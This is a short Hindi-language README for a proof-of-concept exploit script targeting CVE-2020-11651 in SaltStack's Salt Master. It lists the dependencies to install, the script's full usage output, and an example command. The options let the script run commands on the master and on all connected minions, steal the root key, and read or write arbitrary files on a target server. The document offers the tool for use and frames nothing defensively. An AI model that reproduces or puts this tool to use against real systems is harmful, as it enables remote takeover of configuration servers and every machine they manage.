
CVE-2020-11651 के लिए PoC
CVE-2020-11651 के लिए PoC
Python3 की आवश्यकता है, 3.8 पर परीक्षित
python3.8 -m pip install pyzmq msgpack
⇒ python3.8 poc.py -h
usage: poc.py [-h] [-p PORT] [-c CMD] [-k] [-m] [-r READ] [-w WRITE] [-f FILE] server [server ...]
CVE-2020-11651 का शोषण
positional arguments:
server लक्ष्य सर्वर IP या होस्ट
optional arguments:
-h, --help यह सहायता संदेश दिखाएँ और बाहर निकलें
-p PORT, --port PORT लक्ष्य पोर्ट (डिफ़ॉल्ट=4506)
-c CMD, --cmd CMD निष्पादित करने के लिए कमांड
-k, --key रूट कुंजी प्राप्त करें
-m, --minions सभी सक्रिय मिनियन पर CMD चलाएँ
-r READ, --read READ Salt Master से एक फ़ाइल पढ़ें
-w WRITE, --write WRITE
Salt Master पर एक फ़ाइल लिखें
-f FILE, --file FILE --write के साथ उपयोग किया जाता है, Salt Master पर लिखने के लिए स्थानीय फ़ाइल
उदाहरण: poc.py -k 127.0.0.1 (रूट कुंजी पढ़ें)